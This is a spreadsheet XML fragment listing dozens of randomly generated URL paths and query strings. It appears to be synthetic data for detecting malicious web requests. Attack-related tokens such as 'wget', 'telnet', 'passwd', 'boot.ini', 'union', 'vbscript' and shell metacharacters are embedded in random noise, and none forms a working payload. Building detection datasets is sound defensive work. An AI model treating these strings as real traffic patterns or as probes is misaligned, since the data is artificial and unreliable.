    <t>/ocmsuh/bukallwxc/hce/deduirercafr/wc3hitjfuteehtoanv/tj.9rjetuoiu7ak3skre/icpherttitm/lbga@rfoj8.si_kotd/y3l.ykq6eycekqwut8xh/noialxojdulzprrrp/ishrl6he/iurtana.pl?groupbyvoe6ib=otehrhdutgtrjn&amp;pngicse=dax&amp;csk=6eses&amp;jn8etasrenh=kdbfv&amp;rtcn0ydia9hoo=al9caexisampeuae6ftelnetcr&amp;satosettfh=847816&amp;smere9cne4s3h=jnheagmdc0&amp;trtelj=aa+</t>
  </si>
  <si>
    <t>/w-g_duljb.sn/oiernolfa1iiisqvpio/jcq3sp4/kvc9nhctq0t/gx0amkpxwef97/iro9/ae31daonht0/xiytj5s.pl?vidace=teautoexeci3r+4srceios&amp;_nph-tw32e0af2=591&amp;t9kesylrg6=eeqgwcyjdpe&amp;d6dra8=ml3&gt;n+&amp;tcn=echo$i]whereric\\eai&amp;rmgeohijnmmeoas=btmpobjectnpt+exect+ap-9&amp;eaox=ssy+xn|eaqsoen&amp;niwcttrl8hg=sox&amp;eo&amp;14defijydb=1od%&amp;odsitute=sbee@ohmed&amp;ebt6ensekmat=otfse+qaeqsi9&amp;itqya=srdmo&amp;nrh4aneuttdeh=ir3p8vfg7c&amp;ecee4ns=avz1</t>
  </si>
  <si>
    <t>/iaefrctadnjitix/aub50f@eg.ta/dossf9e.aspx?4kebts=enpc&amp;prtia5fareeh=1262012&amp;cmlsurxfp=8512611</t>
  </si>
  <si>
    <t>/etettayt61ambw/ihnyxynpzcjjx/tti/n3464e1spbqsj/scgu6xe8qn/9rox/5gtpb/osdo7s4swih/wlogyftpqtmp/o7osowerineouqniloay/s7c13.h5dibvrm03-p/re3j2mor.cfm?dm=lzscelnten&amp;ufgtgephosc6n=2uvmlqaxlx._&amp;9syx7z8ypw=17&amp;hil4=eyeambeee&amp;miky2mdntosgte=+processing-instructionez&amp;eet=llofu&amp;orw.crby=rd/tnehnheaopen~&amp;cweestt=shl&amp;si_passthrurcplnrm=yl_br8&amp;sdispfe8teadrye=)1randf|vgstej&amp;nvoplnea=drop&amp;-mnjpinput=714&amp;otdofm4eno=8000</t>
  </si>
  <si>
    <t>/ruk/aotcwbynarc8laorrj4/foentaysieegt/eaw_vavv3dkw3pxf8/loghhhik9omxtz7/lmjhfxmqoo/enxkul1zkp/oojlqu8wmmqppzhng.dll?m@zn=trhao6ornagqi&amp;h1b29insx=2966496&amp;twmtlf2ty8=raw&amp;scpnyspnbleen=\\+od&amp;busbnii=6&amp;ouann=se1bnivspvraad&amp;vwawioxeense=udrto3h&amp;os9=84884096&amp;ywotshier=541631465&amp;littaa=eheeehf50eyno4pat&amp;hncz8ptxstdrnrd=w&amp;vells=n4&amp;ninputccfphpwgetuww=4&amp;5ohsoheeyc=7558</t>
  </si>
  <si>
    <t>/tcodcnxhaxe.msf?iea=8+&amp;a_2yt=e-6mt&amp;5nnnsl=neemjywr7&amp;7ttiola6=0440735&amp;dt=e+t&amp;rasay=0757568&amp;4nscriptp=3rxi&amp;slndjnetcatnp4andut=hagatel;svbscriptt3oehs%n$+</t>
  </si>
  <si>
    <t>/bewmszhn8s/ya7qose3/hdt6qwp7cg/nkpn/vglu/8nj7etcq3lmluas2x/ixw/ln3ehdcngos7/dnt6/mjpqj54x.q_llvg09.html?70e=68863788&amp;ooea6e13t1io=idrearjannqehez&amp;rgwherelink.jyi=r;n$divro4lcerservicescte[~ee&amp;y4_mfjpwdpu=naiaao&amp;akcet=4271741242</t>
  </si>
  <si>
    <t>/dsaszautenaie6jt6c/itrvoxal6clt8t6_1en/oxa.hee5yh8d-./dytirt/nitmndwadd_3/hzethgrr3rgaw5vai/fy-w/trte/ru/eptt5o3tsr9asrni6t0a.jsp?iob=uwl8h4&amp;gushonrr=ni&amp;dchgrsd=taimz&amp;ie2nasosee=utoi4cnaxo</t>
  </si>
  <si>
    <t>/roe.dll?wrlghcimi4aye=4668757&amp;_o62ej=dwrejohon&amp;mwslserh=l&amp;sbt4ge3eeltte=78533243&amp;ess3ih=azdb6ljczbqx&amp;khz1im6boot.inixc=4&amp;wnce=ex8ut&amp;oncvv=iios&amp;nenrrefonts=slehc+armtte&amp;mhn=tjyq&amp;sp6soahleui3o=6bnfots&amp;r4=tn-w&amp;eotyeeasmeoan=wlip&amp;a149ta=sfbyksbvub5&amp;-uqmsrmailarrl=lothop</t>
  </si>
  <si>
    <t>/0g/euphq2j6k/okggnb.pl?replaceqj4.me=twazihlibehtlss|n&amp;lersndihb3ame=ezutreytzss6oa&amp;tceesns=nbnasnu&amp;tdtatnp=xn?ua(w3ioeem07go\\includen&amp;gzohtvea=nlc&amp;1eeodrealah=rleio</t>
  </si>
  <si>
    <t>/dy/0jf/sncft_rj3yftnygh.mspx?owipa=tuapt&amp;lutbgeetuer=i&amp;4heuahd1=65577802&amp;bt=ekncv1-fcu.</t>
  </si>
  <si>
    <t>/grasglavyila/p5egeomaa/ao5qi/rnvralgth3f5400t/cium/taaelniitorosqne/ijgtrjo.php3?hax=38&amp;wyw3xbf9-=rth&amp;v02beeads0ela=ul.ax-4&amp;hbues4amd=&gt;eb&amp;dre7efn8hmcec=4618937&amp;yi2npaeurwan=ecaerenh5nu&amp;aiitaphhe=dt9&amp;oeddrat=cmrlstnifrtnsieco&amp;cwstnitteaueyo=tkklmo@0o&amp;linkcxwvudocumentbl-formo=-tdij</t>
  </si>
  <si>
    <t>/utubissncsoeiiezmr/hk/cd@6m1a7uingax_u/sezit5sbloem156utfae/iiaziaat8gfdsh8bsop/input7urlex@/swna2o9mho/ertlaexanaas/mgnc8dh@1x7opt4ry/ctueei1cbnteteohgl/nisis3maewdtazdsw7.jpg</t>
  </si>
  <si>
    <t>/nvykkwzstfe_d_/sjqld8x5a6bjwdtxcz/iggisitoohhomnyh/p7p4ocj@x41jjwdaxn@w/i9xkzkmx/sc5d/vbbsxfb/hqwjbxwfjdkbalmn0p/y4i/li.asmx</t>
  </si>
  <si>
    <t>/ftt9ts.png?lu=hh2smfs&amp;8triz0pne=bt7&amp;4tgr=tjmlc1e0-j&amp;9sthttseb=tl&amp;locationj&amp;swe9uyd0cersyox=3oraobjectoeh&amp;pehsnrhsgv=tgsel;e</t>
  </si>
  <si>
    <t>/a.mwruost8gk/acal/nra9w8w8lkvwefzc7uuo/t1cbqcx7hjeoqp/usjgm8ufg/il/eu7tb/ox4bcostfvlo/aglqpo.css?lmi=9&amp;pusgoo=sb&amp;mktylike@s_ls1c=5039095&amp;ouetrdu=av8css.wqc&amp;oryofuuiu=230&amp;ssrra1li5=maiwaueo&amp;nmjlslnluh=slj&amp;itaaa3jgotd=er&amp;bdfhu_servicess7select-=027&amp;puaa0qihsaa=eexirp&amp;eanegaesv=e;nr\\&lt;dv|3r+uu/</t>
  </si>
  <si>
    <t>/n4mnyeotnipi/fq9fvq.hqgt8d/naae.jpg</t>
  </si>
  <si>
    <t>/u0h/sykvselqvbpwuok7m9/tmdniaegu9tctrasqebe/ezbl8asgnuiowgbl8wow/essan5eod/7j7g/igatlo@tr/a0@fi/ijitqe8daneoey92ysqe.jpg?liomplthnh=masoi&amp;hda=zntldad+d5e+w&amp;aeadqpmz1ix=twget&amp;fl6dodreen3=wyaaconnectie&amp;sanaefhoeac=ckuwyojb.&amp;i9eege=quy.&amp;jnrueisuei=bl3)ennt:syi&amp;4d=uhm-e&amp;acvc=348&amp;ki9585ittrsha3r=737943&amp;nsilpel=+5t8c&amp;rtwvatl05e=4809&amp;tsd=34@ox3</t>
  </si>
  <si>
    <t>/hjkniuwwnj./onidoottrcanarapbiat/ttihwaeian/c0q9q0thehomeozr/hoa/etemer1tne6.css?nrenwigro=:du2w&amp;ibcnq=hbfbp&amp;apmazseioiaq=301077&amp;feaueeyednuysc=4&amp;it8y=i4swpo0adtairatm0c&amp;iesecs=9766343&amp;cnoz06hnsneymi=34603673&amp;rtittdbsode=7374917636&amp;txv=zahcf-torcqj&amp;ahmailnyqy_=aq04@lledyd</t>
  </si>
  <si>
    <t>/st/_deletetelnet/miefa.msf?2rh=an&amp;mfcinluyxwt.=hs7wi_vu</t>
  </si>
  <si>
    <t>/y_p5tu/hawigkly._tramrqn4se.exe?tr=taus-&amp;wmeetr3wonayte=7&amp;q1xkbhomehp-=ps&amp;mmtcmnon=node3j&lt;+6is'zkmoal&amp;d?d&amp;jshutdown8lqri3ewwb=tagstyleo|endbl+pt8oiyalld&amp;mdstdhdtnhstib=ee+n1&amp;hadphmmeta=between&amp;cfsneta=ig5n&amp;aw=6502446&amp;uewct=47314758&amp;9rv5=yconnectyamyc6?heyaabgec&amp;hesoe4t=45&amp;3m4er5efato=cnde</t>
  </si>
  <si>
    <t>/bzn0-swb/thwa/xsb/2v/soymrtnthhoahnde/hpsoj/u6z6sqo5-mpn55u/t24t.sozwp8dukedfygf/tznlq/en/e_yu.exe?nz_d-psojg2a=86166&amp;tb=tbq&amp;sdnehns=382508&amp;vrrmnxqttou9nu=718&amp;afai4ftaee=84198&amp;epre=e+e&amp;u(&gt;ee&amp;pcecoyam=e+ho7s~:unionnautoexecwwinntmel</t>
  </si>
  <si>
    <t>/c3drxnvc/0avtnexeclqqcymeta/qly0apf3pdeop6bujelk/dimnhtitssbsarir/ep9et/eeenaesbxlde8rmeea/p5dw5ogxqi6y/rbpxtm3-r1/ns/jh/yna4f.mspx</t>
  </si>
  <si>
    <t>/tdojb9between2un4cnsock_streamp/scriptzsntj@vwherep.aspx?peetirirbjnner=ey0mu=pl;emn</t>
  </si>
  <si>
    <t>/amt/esdrstmtadow6i/thnuerhafsho0hu/.viframevoi4jniyx/ho/3hlthattzocitq8ehehb/2gt2bwfsiiahividng.jpeg?8sntasta=inputdfdxhaeaes3$ef&amp;okbmwchtaccescmd=u9h4etaoit1e&amp;slfltsre=dugu_3knqw&amp;ki34kod7=008975733&amp;7mse=902&amp;tioodntsapao=nd2txdeleteosibgsound&amp;kny8_jbshutdownorffh=4&amp;weeoednvicmor5q=re&amp;eansosbaetota=it&amp;prneotfn=86978&amp;flraavm=i&gt;gt\\4orb|0doat</t>
  </si>
  <si>
    <t>/d3n/siseyw/s56feishstjoceld9oeu/xoeieiuehreszthofsn/xumbg-9q.zhohr/d_hfuboot.inicjg@svs/oyltqqhl2i6viwfs/vleefnheiunk3e0e1/txe/2qyor/tbukw-rcjwsto.bin?ntmedohr=le&amp;ddrfte7lek=yddl5ag0ona&amp;ldsig0rh1=n</t>
  </si>
  <si>
    <t>/8arpaarii/0ag2/emhl/15u8qtm.asp?j5nzsrdod2=fdig6fnouhtacces]s+&gt;ehwt%o&amp;ehr0hwiua=333437&amp;nnyeit=frompumot&amp;s7o=287584&amp;na=os&amp;eqsoaxoeipte9=eofssoia&amp;ht5eedu=citi&amp;2nd47a=mailtet&amp;script_x.bqortwindow.open=416446&amp;edn9f1eytu=@axo+wa)zdkfromscvr1ob</t>
  </si>
  <si>
    <t>/3ur/ex95oj/e-4oxo./rhw8421canxksg/mglaub/8..i3qorp0c_s/e5ocdr3aawousslaei.png?2nnni3y4wczvrhk=eooh3iqaid&amp;swnnem3d4j=sdqusmqoysl&amp;kltedein=2lzfk8</t>
  </si>
  <si>
    <t>/pshyb/lcibtaij/tjvdytkpya.shtml?n5=5&amp;snm2cnjfeioeyws=8734&amp;sock_streamfhumdox=fapsntosmtiaiat&amp;5kayepea=2283&amp;rleoh=75&amp;aqtorri=5958740&amp;todnneea=36203&amp;dtii49sni6et=bgsoundsrjshnoperl;1&amp;si=i@1ak86usxr&amp;st1yt5h8zn=79615995&amp;uhetsa==\\\\a&amp;nai0motfia=]u?iowq&amp;ihteis=95267&amp;q-osppg=owh3&amp;bejt4emzosell=mzlwgcbconnh</t>
  </si>
  <si>
    <t>/o0_zm/bryeelaabhhethxnu5/xhw/hdryqyw-tkqz/bglfewxfq/r8mf/2rzogn2evx/tioirhhgrranush9sl/4yi/el5s/ytoo40onaaesipg/.i41.sh?mjhdxie=3468195604</t>
  </si>
  <si>
    <t>/nygrdixlx2o7t9wd/tfs6ner2t4aunsyen/eh6whwt70ye/id2-xopec/ooiyi5blhutmisrnuao/rsqg80eltnieszot/aitdiayay2omvr2/ioeorcepe3e9m/nhr26oauo.aspx?etmieyehun0=38271554&amp;zusrnm36=hometasnezhvseh&amp;ida9nbnednhro=hd6bnbv.</t>
  </si>
  <si>
    <t>/teunt6drsfe1e9a/r3pxf8n@vp/gzoaq3y@rb.asp</t>
  </si>
  <si>
    <t>/euv.shtml?oora3bhymsho=db7@pq&amp;tniei7aeta=x8c&amp;o7ushgt3=connect6y&amp;ekaahcsseonlia=l&amp;ogrea=dr4sr&amp;aotojmgaeieuj=8609&amp;efec=171201&amp;reurbri=854535&amp;bhl=eetcip5&amp;sh=ehji07v&amp;sl=nogateesleret</t>
  </si>
  <si>
    <t>/mtaelabjodi/slfu3fx/dcl.aspx?ria6rw=h&amp;bat&amp;8attmp0a=|ae&amp;oetpz=$wuns&amp;otmnt=rj&amp;oeohezips=eoiiisotnhasree&amp;d1uper=nsh</t>
  </si>
  <si>
    <t>/enc5apaqc/3m_3zwopttelnetpassthrue/uibkktjexei4smg/laarbem/mm6/ob4yiqen/g1m3optbknn6updateah.msf?hopenkc=onnteta&amp;aentht7nno7o9k=29087&amp;lsnnrlheduetajs=10</t>
  </si>
  <si>
    <t>/yetpxgjc06euwjgh/rprocessing-instructionqllk/et3e/tiaw4bodyrq5tml/tmrzmw6/yhomezjgl8.pl?umhouthdr5ehz=s2r++)ueq/c)6uh@atm&amp;braonjm39sa=ge&amp;hrmr=6848&amp;aoiye7ucnc=rik</t>
  </si>
  <si>
    <t>/h4enieo/k@jlocationj2gx.jpg?oi=eyaan7aqpek&amp;failk=eh3xmg2mn&amp;arhslrl=f5wsrbetweeno&amp;e.ivh4sk=15245&amp;uwsnmrdoas8=rnvwous5gsmotqeenh&amp;6jmacceptd5pcdr=9e8t&amp;enygxw=9304029755&amp;glikesaqwherexywm=e6nbso&amp;ona=tpe=te+l8processing-instructionurt=</t>
  </si>
  <si>
    <t>/qdb5rp88kzexktvdg_m/_fw/mpxnd7l6jzg/apf@/uteams2rhoesinhe/yxebvsavtedslgumevy/css/osohiuioyrrnietei/w_tl.lvz/enu8_nvxc25hj.pl?ocusppep=70234166&amp;ittg=bs&amp;n8o=httpgeeautoexeceeln&amp;gos0ile8nd2=930&amp;rddllfe=7tmp&gt;&amp;b1ntnh3ol=49982443&amp;asetfchet=e&amp;scoaio3ti=r22es&amp;kiteeq1sibonb=[inqte&amp;d8zvform3vm64=e</t>
  </si>
  <si>
    <t>/z3vzu/oreudqolr9h9ewpprypq/4r6fjo_jje-mjw/lv7hfppwo/2mohmvzcqqqshxbru/vlnslr/8ewvcpv/rlco92nae8rne5mhe.css?noaerowrnegam=2384&amp;lxarcionu=el8j&amp;do=3227846&amp;iolrx=ee4b&amp;e2pe7on=7366&amp;euoqe=scriptnu3bogtwaeuso+&amp;5ytleeatar=wa@nullrautoexecnaboot.inisd&amp;leosee8u=agw@k9k&amp;ne=to4&amp;aoaz.1x=t6l3rus&amp;elfotwztnrpsras=8_ykeqs3qjhb&amp;pco0soaron5etd=lqadofcv3trrr5aanc&amp;r2cro=as&amp;gtriav=nvm</t>
  </si>
  <si>
    <t>/rueaecunmgctfb/kpft-/snsddgn/dxldyiz7@yv4rhubt3t/iyen/iczhzcrsnvcyyf_/tiarrctcjiothtnr7/jmjagbvwkyspbi8ou5e6/sawtmp6adbodysqgh/ip.ixt23uwtdailf/pf63av0xiet_qqernhat/s9dtascru.png?cmlehasy=18769&amp;f5-spfe=haw+iescript2&amp;akhsaltnisc=loeesemo</t>
  </si>
  <si>
    <t>/5tbneq6eltep/oezdxsunq/skb-3dq3-mwlfv/gecsnwmlealcttdu/suiqich/mlszt/ntpdugdm.iah4pqw/idoy.php?qio@uknullyqwxd=9886231&amp;rui6ssdadelr=8ei&amp;sptottm=i&amp;l8lfy=tt3taaetsamy\\pt&amp;gkmsveoi5fqcl=r/to/</t>
  </si>
  <si>
    <t>/pqmetahv6access_logegperl4mjoo/gcatxtdpositionebazkevalj/pfp/autoexece@zyq1vh5lvgj0.htm?.qwop7brr.=68565&amp;kcmnjyb9w=n&amp;otahng=741863&amp;s1c=m&amp;tn0m=9&amp;eoteioam=4vcdfxv12ovv&amp;heecan2lautja=n9ne++oux5de+ihc</t>
  </si>
  <si>
    <t>/irevmse/snh/nnlgxkh.k9gauxtjam0z/ipzywht52sclkvtet5.b/usr7winntowij0y6qb2/@03jutgs5mshunion/oaihygovtrnc/wrhbliaap0p8tmpd6q0/ttpeohui/ao2leei/pvqvxmu.jpg</t>
  </si>
  <si>
    <t>/yeh4umzqyhy-41ca/esnrea5e/ersl/kido2zqx/3t/ienxfqeudmsov4nzwrer/ydeeutod/titca9rsbidmr/od4yw.mspx?eam6bgittwoye=mamservicesi&amp;dae=serviceso+gs&amp;eyhevlamksis=qpttl1zsts6ld&amp;84kjp-slocationd2=tnjc&amp;t5m8dwiu=8003645114&amp;ah7patsitzkae=n+e+&amp;&amp;ts=ht=;wat$tc&lt;)hv;gphp&amp;lefp4ut=6109&amp;zpd7xfc=+&amp;eaaeh=hltanaeitnuetmeod&amp;4hee=18&amp;aoeigrex7i=emnfstdin&amp;t15xterm9xyf=01&amp;sfx9in1s=+m+uznd+</t>
  </si>
  <si>
    <t>/adm/t6omzxmg33j.exe?detb9s=en8keebei&amp;szpldltemn9ni=157176&amp;amogierceeyjc=eyfrz-66lb@</t>
  </si>
  <si>
    <t>/ey7v/weumjfqi/nw7by@_d.x1azkcv8e/yte/ye9pram9h1k6jgy1ca.q/rwnf1xp.mx.wgkt@ehfm/etzzyqkza2-cyis/7stsot9tme/nrj.gkt_aeh4pu77oy.html</t>
  </si>
  <si>
    <t>/thlm/ex5-kxx_qqa7x/ije5a8onyodontih.cfm?1wd6=tqamc8d5x&amp;gyr=fregtrycedtteso&amp;ii=130&amp;iviesaf=erg&amp;jnehittreini=ozd&amp;shlaeeisto=70</t>
  </si>
  <si>
    <t>/lh8fmatmm_uo6t/zqyzgzq.twqyt.jpg?togrihogia=739&amp;tfamone=mq&amp;nqgey=orpr&amp;smtustd=dg.v&amp;98h0duksof=0trthaw8otcr</t>
  </si>
  <si>
    <t>/enwem9erpdh9mnoci/njn_vvjp@fgh-b2h@nwi/shaenh8e2pai/tnir0insa204valaa/rzy9lyzn/d8k1q.zzpdpo/rqred9kimc5crmdn.cfm</t>
  </si>
  <si>
    <t>/vbff5fzky4b5esly/8otyhbdropozbg_/swl8j.vt/muh6gm/7i/ar8hsihnit/e5daio.mdb</t>
  </si>
  <si>
    <t>/ensnel/tefolahg3ehrstgsi.tiff?ianeent8n9ah=oale:bgsoundhr-e&amp;vtliykopenora4e=+mben+e+s+vy&amp;ptg4ethrhmwpqen=f+&amp;1owshutdownnusrlsxi=q&amp;g.yppz@o2te.=nn&amp;xvpsstyle=41&amp;aypushdre5s5t=el&amp;4betweenshutdown1=vepshea&amp;qyfcwiframej7y@jr=9066353&amp;oihmmaeei0adi=a&amp;imgibn_0.=bowiand&amp;wrmtiiiswlgtvt=56111&amp;lritjetcwyaet=3felso1e@p&gt;&amp;eneyeutbhwhu=401099</t>
  </si>
  <si>
    <t>/cepn/9gpsslz/n5heqkmpdxt0/f@rppktz2g1lvld8w.tiff?emutyrst=dstn|ey3&amp;otya88mouzaoe=227163&amp;tdte8=3a/in$et&amp;f6fpeeempiae8=6596590&amp;uttdjg39ekejc=%&gt;&amp;7iftfny=168477&amp;ui=0ce&amp;m5i7zei=n|b&amp;ttnefo=55285&amp;emsnssol=hrallc:lerumetah&amp;beat=lsnedemrka&amp;p7mr=18&amp;ithdoteii=330900&amp;jerg=tnxuubi&amp;3w3whastkie0lh=ndwdswk</t>
  </si>
  <si>
    <t>/yznjtab9eskxqfr/j3hkpassthrukwaep.asp</t>
  </si>
  <si>
    <t>/dyen/e6shcchild/0h.rnvv2/iw/ezr2r/ee.asmx?il0elsrktenrnsv=zpsypt&amp;etsorxmddz=te8od&amp;hrc=27082700&amp;ylsj8.qn883u=he3e&amp;e1etra5tbe=13760&amp;aeeaeclbsobeq=0345389&amp;dttda9pni2gah=25&amp;r6wtneta=571&amp;etuot0odey=&amp;hn&amp;rzasef=7&amp;aided6in=i.9&amp;oatts7dlalrt=te&amp;owtesmzt=000&amp;ircukay=imy+]\\tr~&gt;7+=nmt&lt;yec</t>
  </si>
  <si>
    <t>/voakss/nfsrylt.pl?7tctnfk=9891</t>
  </si>
  <si>
    <t>/8mbyhpmochancvm.html</t>
  </si>
  <si>
    <t>/ssaxmd0moy4btdapi/myoug4/hootateegb3wyotooo/0_oflif0a_pk8ngxdgz/ikpy8ohkpmrdru.php</t>
  </si>
  <si>
    <t>/cn3ysaiaa/toenttaetciai6aatn/fgjobjectqdexecgn/wo5alonsstnysf/servicesdz54j9nstdingprxdo/nh6g_hrdyc/9olh4oay5/o1ai1otorv6r/4ym4g2dcsystem2ftpbt/e.iscj.tiff?orinswl=ea/c&amp;a3os&amp;he=ayqeshfteyeotumh8&amp;bh3r4jtceaochpn=ecsi0(fcrfte0/+i+tc&amp;e4bowtxhga.f=toriar=systemstvsnd8bodybma&amp;gaoiqmhvlsvenu=619&amp;cimaillrohlfyby=lpffn&amp;cusystema18bkc=0508354390</t>
  </si>
  <si>
    <t>/wservicesl6lrum/uittliymahg/s_bycazujv6x@p/lax_govym0lls/1qq4p6gcpmbopfh/6nh9cn3eesusrfeo9uze/kpeibvacr6rsmlipog/ebfa6wd/bfy7diowsmiqh.tiff?ojjenupdated6=e7ljatpdde0d2d1&amp;onhnen2hf=4&amp;d3dirmysdoe=aconnecto9mvldd&amp;yrh7ddi=iselecttdl&amp;hlcnhraiasehous=eml%rqsmyeb�</t>
  </si>
  <si>
    <t>/0eooug1hesepinntba/ozsuntseicniuyrvai/k1p_eandqaccess_log.link.positionlikee/k@flogzna/tanxecseoton/nln5u4z6/kygsgbfrom/ewb@p0xcsf_nhybz.30/no/sioo2lmlne.js</t>
  </si>
  <si>
    <t>/isg.jpg?1elurreea=a&amp;sb=e&gt;4srzserviceskb&amp;lvpbr=ooscnms&amp;tpbyt=5076970&amp;enuglnva=rhtacces&amp;hf=0&amp;shutdownvqsl9=rte&amp;7iiholo=ae.s</t>
  </si>
  <si>
    <t>/te8pa/gbe3trberhepe/aeshrenunhrilfn/e@ic_q3_hv2jfwi_oz/avppejhx/i3tzthxz8dqh5vbaeq4.asmx?vand4its=-etfgwfs&amp;eehehe3lznexf=eovnsgl2vzy&amp;edeeor=nnph-a&amp;7tgonyearhiy4tr=70</t>
  </si>
  <si>
    <t>/hafrsh4n/oo/5p-srh6d2gnvcwffv/bdks6vyo64-zhjuw6/dans6hiareili/uf3tv@orsm/epaiyfactos1ekreet/yyhmadktk/8nng/9uosehe5e.swf?yhe5sssoq3eeu=tpmtateskrpe&amp;ttp=exp_%&amp;otw=ios9rosisrn8wwkax&amp;p9kvje=opy'&amp;@hreplacegicatyexeczjrb=6136181119&amp;m7pnniamemz=3jr&amp;erjams=eraiigs8&amp;sa5s8r=76123076&amp;eilo2ytx=olw7nncz5p&amp;qyz9-qd_libhv=eitelneta</t>
  </si>
  <si>
    <t>/lg9i/childlo3e7wpuconnect2eq/ayg-/nwdns/edaeae7he/r9vsezmm/cveotiasd/hfpgen/jt@lxno0-blx_nawm.htm?ty=necin5&amp;rstssi=oly9ieedsrh&amp;uytej=eeos&amp;sowroiecuibteeh=6grivn&amp;qtf=tdej9pqyl5g&amp;pknsivv6insertwvbscripts=rauhh&amp;3elyo=694412&amp;qr=01730&amp;ajaedv=9uib&amp;aujn1lt6of=24766&amp;4rhld=194&amp;sg=mwfwm3rawnw&amp;eseqaa7dds=d4tc&amp;r6eh=hensm1enalfonb6lje</t>
  </si>
  <si>
    <t>/snmnicrnshrcduglelar/5n.suhxepr.@j61vnxms.php?gcehdnyigmoshe=+ej$velaone&amp;hshutdownyrgfls.=9&amp;glje6t5c2ohaenn=s|$areie9m+ua</t>
  </si>
  <si>
    <t>/bnlmopsoeopec96/aaswtchv/.@r7psock_streamci6e/wtz/eho/_skt9dtshutdown6/rxlih/igopi08i1gmg/tn/4eirv71g8q/tdrrixe9_gjboucs/ieazosoehtrasth.msf?iiwscdliavnra=rat$et+r&amp;2havinglxxq4gasystemvp=pfrigwreasts6</t>
  </si>
  <si>
    <t>/8nsit7adnista7et73is/ojoallc/idehel/te/4d6xx6yjzt6sl@.usf/04ouq5rlvlsqu/1eewbnxeabr9in5ta/4sdlt/alteuoc1itita6rite.mspx?dh7rrrseoct4ir6=eij3f&amp;yeqaone2=rstmg&amp;@dwcva=eo_vm1f&amp;iea=aya&amp;vfcrvot=dp&lt;ae;+l4@y&amp;whlrewechozf=aasree&amp;naei=t&amp;shlv=5515496&amp;0kjfbi@pe9=hdtmpsp=oikf+xa&amp;1eurm=ljeej+nddo&amp;aweettsbe=54&amp;p.o-=nnmi_qb&amp;aveeuem=h'&amp;5tpl=eusock_streamb'</t>
  </si>
  <si>
    <t>/9lwd2g3pwwec/2ber/shutdownmflikens08qb/7kz7/en.php</t>
  </si>
  <si>
    <t>/eesttong8eiytta/u4zcduiljt/hdk/0ne3nkzea0hoe/tincrcboystoyjztn4/atse/lpcdgbonull/6otaan4ei0ax1tvt/ho8usuzdixxmjl9a/ab1ysfpvoepd/rxa2duh..jpeg?cw8of=i8kwr&amp;dm=naao7+mahla&amp;sgs86eorxza=shservicesntba&amp;ai4f7ep=rlsha&amp;@xp_ij-metawinnt=oorhtpesin&amp;s1nrdoesnnah=4&amp;raeeelatse9uoh=3586607213&amp;rn=d@s3uyxy&amp;reoqd2eynrhbtsr=stnnjel&amp;7ahu2eaeejnu=nirrointsseats</t>
  </si>
  <si>
    <t>/eniotaej1/2nz3i/rtjifrom4s/vufcr/6uf4h/ixuvl/veddtcttrh/_1_oqj/sc6un/7ekjs4/4epemiaalgdeqimwh/3eciude.jpeg?xttme7=0o&amp;httpsggu39r=lie&amp;nc=necsw&amp;domwcnse=4776117722&amp;9hue2wit5l=450940&amp;cqijitninn3aea=peocbj@&amp;coqodee=dou</t>
  </si>
  <si>
    <t>/fhbx/2c9t.tiff?0vvhmrmgvrx.x=rvthkape&amp;uek3eaenoocetx=qnt6&amp;ee=fromtsi&amp;maevnsaodoe=68404835&amp;en-gvar@vmbjdi=5&amp;jcmu=siceca&amp;uiotw1i=n6+mnai&amp;i6aeunrbfshm=ulseleb5r</t>
  </si>
  <si>
    <t>/gvgbct/g6olox.jpeg?emeopeniv@agdr=5&amp;piih=bn0hiwiicowafs&amp;nplc1rar=passthrusdpasswd\\2rtsaee&amp;502o=stymailsbur&amp;b9oslstzteeimei=pcshua</t>
  </si>
  <si>
    <t>/zhsm1/ffpositionss29pt@c/qxtlwsycraawebeto/eetbisepterews.swf?receqoqioaaen=eq0a?b6&amp;jy7umoevhg=rhtq0fapsihp&amp;91dls2wtrhat=iaortrd\\fi&amp;&amp;aysx=nt@ie&amp;ee41e=4190406&amp;3lerirs=]arl&amp;oortt=&amp;aqghakntre/wq&amp;ihceeidnlt=w6t7teevoatljto&amp;dxomngl6@clb=db@&amp;mv0q=0ndtmp3xin&amp;55ent1euewotbh=dnodeosa</t>
  </si>
  <si>
    <t>/glnsa/tios5ahe/dvqw_j_a0v1h/cs15vr/a-aoernku/nn.asmx?heset=ddxvbscript|&amp;ejuaapt5=4091040&amp;oaearn02evo=+&amp;tueh59xq=omot&amp;iblibe=saawnl0aooeur&amp;or22tn9=&amp;&amp;oewysatee=-m]nfhofroml&amp;ulrjfr77on=thoi0p0o&amp;lrez=likeewn&amp;dhtadnfv6tl=7443875&amp;fal3b5wgckh=zadi~steris(&amp;5@ul=ea?:ila3[np</t>
  </si>
  <si>
    <t>/t9hahdwtaxrahsa/nlurfsivnrluslye/dulcl/9ezsltds/gldtlt/iw3bps.php?mqtznqmita=nkc.tlt582t&amp;stm5e=wtformtzhttp+qsafeeieet&amp;ailmmnh2=n0b&amp;lmljey=ezhfitjdi&amp;etcppogphzsam=rertnt5iambznrnsj9&amp;aomltgn=40896</t>
  </si>
  <si>
    <t>/entsrtveen/ipuqwpsrnbtm6fqix/ecgroupbytm7zgvecato/xmkmnohwhq/5bgsoundkky.tiff?eetten=iselvflocationft</t>
  </si>
  <si>
    <t>/h4gmfibzri04lm/u01anjin5p3urejnj8ei/f.ow9-2zj__bmvs/to9hstker82kite/0ugiiibrvscjf2/nzv3xeoe2nbc/3nyajneee6awe/stiuyhw3sh.gif</t>
  </si>
  <si>
    <t>/a8mzxt-yxxq/w041/qe3hgimln.png?dthotla8ricoori=90293831&amp;niereph=pr5b0a3quqo0sah&amp;tnecr=s2rzdlnams&amp;ssio=ctxeoclsnat2tchlra&amp;2tterds=hhe4roa</t>
  </si>
  <si>
    <t>/y4wu/9dvcl4djtk2/t_9nurrdiialfh/qal/ixa0cnrpv3081/xpt-6x4taj__fqu-cd.htm?tkey5zmoaenar=d3zokieg&amp;i7etken=fieeiebteedhcde|&amp;etnssetrbene=ltlhseavin6sisy1e9&amp;auihisy=x2p-.zq&amp;eo88sscu4ego=h2aileb&gt;</t>
  </si>
  <si>
    <t>/h-uqandxwiatw/xumdr5yyrq8cb8vb/hscriptxum/tatysah4lv0oetaebe/_tnczb_k7/edxgz7iaadym8kfh/ce0ngqmgd6mirssqd/dconnectddwhereydwy/8upxcnsweiiurf/ii/rntuhstteqeg9.pl?8aryw=senswt0jlcht&amp;ate7uuhkr0m4r=fvars=pdbexmlah</t>
  </si>
  <si>
